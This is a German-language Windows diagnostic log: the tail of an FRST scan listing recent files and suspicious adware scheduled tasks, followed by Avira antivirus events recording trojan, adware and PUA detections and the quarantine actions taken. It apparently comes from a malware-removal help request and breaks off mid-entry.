2016-04-01 10:14 - 2016-04-01 20:34 - 00014834 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJCheckTask
2016-04-01 10:14 - 2016-04-01 20:34 - 00003924 _____ C:\WINDOWS\System32\Tasks\eAHPeNhIUJBrowserUpdateCore
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\Users\Public\Documents\eAHPeNhIUJ
2016-04-01 10:14 - 2016-04-01 10:14 - 00000000 ____D C:\ProgramData\eAHPeNhIUJ
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt
2016-03-30 13:15 - 2016-03-30 13:15 - 00015110 _____ C:\WINDOWS\System32\Tasks\ffgogogoCheckTask
2016-03-30 13:12 - 2016-03-30 13:12 - 00004200 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateCore
2016-03-30 13:11 - 2016-03-30 13:11 - 00015136 _____ C:\WINDOWS\System32\Tasks\ffgogogoBrowserUpdateUA
2016-03-30 13:08 - 2016-03-30 13:08 - 00000000 ____D C:\Users\Harun\AppData\Local\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Public\Documents\ffgogogo
2016-03-30 13:05 - 2016-03-30 13:05 - 00000000 ____D C:\Users\Harun\AppData\Roaming\ffgogogo
2016-03-30 13:04 - 2016-03-30 13:04 - 00000000 ____D C:\Program Files (x86)\ffgogogo Browser
2016-03-24 21:44 - 2016-03-24 21:44 - 00000000 ____D C:\Users\Harun\AppData\Local\TeamViewer
2016-03-23 19:02 - 2016-03-23 19:02 - 00000000 ____D C:\Users\Harun\AppData\Roaming\MCorp

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 12:50 - 2015-07-29 13:31 - 01790124 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-19 12:50 - 2015-07-10 18:34 - 00771100 _____ C:\WINDOWS\system32\perfh007.dat
2016-04-19 12:50 - 2015-07-10 18:34 - 00153964 _____ C:\WINDOWS\system32\perfc007.dat
2016-04-19 12:50 - 2015-07-10 13:02 - 00000000 ____D C:\WINDOWS\INF
2016-04-19 12:45 - 2015-07-31 18:06 - 00002306 _____ C:\WINDOWS\System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD}
2016-04-19 12:45 - 2015-07-31 18:05 - 00002306 _____ C:\WINDOWS\System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B}
2016-04-19 12:45 - 2015-07-29 12:41 - 00003648 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-04-19 12:45 - 2015-07-29 12:41 - 00003424 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-04-19 12:45 - 2015-07-29 12:41 - 00001136 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-19 12:45 - 2015-07-29 12:41 - 00001132 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-19 12:44 - 2015-07-10 14:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-19 12:43 - 2015-08-01 18:48 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-19 12:43 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-19 12:43 - 2015-07-10 11:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-19 12:39 - 2015-09-16 17:58 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-04-19 12:38 - 2015-09-16 17:58 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2016-04-19 12:37 - 2015-07-29 14:04 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{72B71363-67D7-4D80-A0FC-60FE645FEBE1}
2016-04-19 12:37 - 2015-07-10 13:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-19 12:34 - 2016-02-02 15:15 - 00000000 ___RD C:\Users\Harun\OneDrive
2016-04-19 12:34 - 2015-07-29 13:30 - 00002429 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-04-17 16:13 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\rescache
2016-04-16 23:50 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Battle.net
2016-04-16 20:48 - 2015-09-24 15:09 - 00000000 ____D C:\Users\Harun\AppData\Roaming\.minecraft
2016-04-16 18:30 - 2015-07-29 13:28 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-04-16 18:15 - 2015-09-23 16:25 - 00000000 ____D C:\Users\faruk
2016-04-16 18:15 - 2015-07-29 14:58 - 00000000 ____D C:\Users\aysec
2016-04-16 18:15 - 2015-07-29 13:24 - 00000000 ____D C:\Users\Harun
2016-04-16 18:13 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-04-16 17:24 - 2016-02-03 10:50 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Audacity
2016-04-16 15:48 - 2015-07-10 12:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-04-16 12:41 - 2015-07-29 16:33 - 00000000 ____D C:\Users\Harun\AppData\Local\Spotify
2016-04-16 12:41 - 2015-07-29 16:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Spotify
2016-04-15 18:02 - 2015-08-14 19:28 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-04-15 18:00 - 2015-08-14 19:28 - 135176864 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-04-15 17:58 - 2016-02-13 20:36 - 00000000 ___HD C:\$WINDOWS.~BT
2016-04-15 16:59 - 2015-07-29 13:28 - 00000000 ____D C:\Users\Harun\AppData\Local\Packages
2016-04-11 23:31 - 2016-03-08 16:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2016-04-11 23:28 - 2015-08-01 22:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-04-11 20:21 - 2016-02-27 14:24 - 00000000 ____D C:\Program Files (x86)\Minecraft
2016-04-11 20:21 - 2016-02-02 19:29 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Sony
2016-04-11 20:21 - 2015-07-30 19:07 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Skype
2016-04-11 20:21 - 2015-07-10 11:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-04-11 13:22 - 2015-10-22 16:22 - 00000000 ____D C:\Users\Harun\AppData\Local\AMD
2016-04-10 22:05 - 2015-08-01 19:13 - 00000000 ____D C:\Program Files (x86)\AMD
2016-04-10 22:05 - 2015-08-01 18:48 - 00000000 ____D C:\Program Files\AMD
2016-04-10 21:58 - 2015-07-10 14:20 - 00234560 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-04-10 21:56 - 2015-07-10 13:04 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-04-10 17:32 - 2015-07-30 15:07 - 00000000 ____D C:\ProgramData\TuneUp Software
2016-04-09 20:13 - 2015-09-29 16:26 - 00000000 ____D C:\Users\Harun\Desktop\Minecraft
2016-04-07 22:37 - 2015-07-29 15:43 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Battle.net
2016-04-07 22:37 - 2015-07-29 15:42 - 00000000 ____D C:\ProgramData\Battle.net
2016-04-06 20:32 - 2015-07-10 13:06 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-04-06 20:32 - 2015-07-10 13:06 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2016-04-05 09:45 - 2015-08-09 07:13 - 07466024 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9108.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00162784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CFC.tmp
2016-04-05 09:45 - 2015-08-01 18:47 - 00143600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA81C.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 09618784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET84BF.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00130616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9CDB.tmp
2016-04-05 09:44 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA80A.tmp
2016-04-05 09:43 - 2015-08-09 07:13 - 00112392 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9C84.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 09675944 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9635.tmp
2016-04-05 09:43 - 2015-08-01 18:47 - 01265208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET9F16.tmp
2016-04-05 09:39 - 2015-08-01 18:47 - 00685584 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\SET9CC9.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00451088 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET85B6.tmp
2016-04-05 09:38 - 2015-08-09 07:10 - 00151056 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SETA82E.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 01285136 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\SET8512.tmp
2016-04-05 09:37 - 2015-08-09 07:10 - 00953360 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\SET91F9.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 40135696 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SETA7D7.tmp
2016-04-05 09:35 - 2015-08-09 07:10 - 21739024 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\SET9BA2.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08929400 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET8401.tmp
2016-04-05 09:27 - 2015-08-09 07:13 - 08669624 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\SET91B6.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 11735800 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET906A.tmp
2016-04-05 09:27 - 2015-08-01 18:47 - 01539560 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\SET9D3E.tmp
2016-04-04 06:16 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2015-08-01 18:47 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2015-08-09 07:13 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2015-08-01 18:47 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:09 - 2015-08-01 18:47 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:23 - 2015-08-09 07:10 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:15 - 2015-08-09 07:10 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 03:57 - 2015-08-09 07:10 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:33 - 2015-08-09 07:10 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2015-08-09 07:10 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:31 - 2015-08-01 18:47 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-02 17:01 - 2015-11-21 15:21 - 00000000 ___RD C:\Users\Harun\Desktop\NVU (YAVUZ)
2016-03-30 13:13 - 2015-08-01 22:54 - 00001983 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-30 11:10 - 2015-11-07 20:53 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-03-24 16:01 - 2015-07-30 19:07 - 00000000 ____D C:\ProgramData\Skype
2016-03-23 11:12 - 2016-03-08 16:35 - 00060136 ____N (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-03-30 20:14 - 2016-03-30 20:14 - 0000000 _____ () C:\Users\Harun\AppData\Roaming\dc.ogt
2016-01-12 18:41 - 2016-01-19 16:52 - 0000600 _____ () C:\Users\Harun\AppData\Roaming\winscp.rnd
2016-01-13 15:38 - 2016-01-19 16:53 - 0000600 _____ () C:\Users\Harun\AppData\Local\PUTTY.RND
2015-07-30 15:17 - 2015-07-30 15:17 - 0007605 _____ () C:\Users\Harun\AppData\Local\Resmon.ResmonCfg
2015-07-29 13:50 - 2015-07-29 13:50 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Einige Dateien in TEMP:
====================
C:\Users\aysec\AppData\Local\Temp\avgnt.exe
C:\Users\faruk\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\avgnt.exe
C:\Users\Harun\AppData\Local\Temp\libeay32.dll
C:\Users\Harun\AppData\Local\Temp\msvcr120.dll
C:\Users\Harun\AppData\Local\Temp\playstv_patch.exe
C:\Users\Harun\AppData\Local\Temp\radeon-crimson-16.3.2-minimalsetup.exe
C:\Users\Harun\AppData\Local\Temp\raptrpatch.exe
C:\Users\Harun\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-04-09 09:50

==================== Ende von FRST.txt ============================
Avira Ereignisse:
Code:
ATTFilter
Exportierte Ereignisse:

15.04.2016 17:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 17:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

15.04.2016 17:00 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 16:59 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

15.04.2016 16:58 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

15.04.2016 16:58 [Echtzeit-Scanner] Malware gefunden
      Muster 'TR/Crypt.ZPACK.Gen9 [trojan]'
      in Datei 'C:\ProgramData\FwinpF\xtemp\mib.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$RE3IE52.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '1ccf1fa6.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$RDKZ3OP.zip'
      enthält folgendes Muster 'TR/Crypt.ZPACK.232887' [trojan]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '7043527c.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 
      'C:\$Recycle.Bin\S-1-5-21-2630849102-760198568-3561441068-1000\$R05MU5K.zip'
      enthält folgendes Muster 'TR/Crypt.ZPACK.232887' [trojan]
      Ausgeführte Aktion(en):
      Der Fund wurde als verdächtig eingestuft.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '505b47cd.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchesToYesbnd\Winsere.exe'
      enthält folgendes Muster 'Adware/ELEX.aetw' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '74b26b14.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\1cb4ac83-5b77-0\1cb4ac83-5b77-0.d'
      enthält folgendes Muster 'Adware/Adposhel.onqd' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files 
      (x86)\1CD27080-1457447150-11D9-9D7D-BCAEC571BF31\vnswFFBC.tmp'
      enthält folgendes Muster 'Adware/AgentCV.A.45541' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '3afd1afa.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\DailyPcClean Support\DailyPCClean.exe'
      enthält folgendes Muster 'PUA/SpeedUpMyPC.D' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '41d31dc5.qua' 
      verschoben!

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\1cb4ac83-6a03-1\1cb4ac83-6a03-1.d'
      enthält folgendes Muster 'Adware/Adposhel.onqd' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:24 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\bvxvcxxvaf\pbqrmvbub'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\nscDEC4.tmp'
      enthält folgendes Muster 'Adware/AgentCV.A.45541' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\nsr6A9C.tmp'
      enthält folgendes Muster 'Adware/ConvertAd.253440.13' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34014285.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34018266.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34018356.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\tmd_34019388.exe'
      enthält folgendes Muster 'PUA/OpenCandy.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\3II5IYGRR6\win.exe'
      enthält folgendes Muster 'Adware/EoRezo.ldor' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:23 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\56MRX9MQV\56MRX9MQV.exe'
      enthält folgendes Muster 'ADWARE/PullUpdate.Gen7' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:21 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\X3HRJY7Q9\X3HRJY7Q9.exe'
      enthält folgendes Muster 'TR/Taranis.2691' [trojan]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 21:21 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\XJWS92VRW\XJWS92VRW.exe'
      enthält folgendes Muster 'TR/Taranis.2691' [trojan]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.
      Die Datei wurde zum Löschen nach einem Neustart markiert.
      Für die abschliessende Reparatur wird ein Neustart des Computers eingeleitet.

10.04.2016 20:49 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\istAAD0.tmp\qksee.exe'
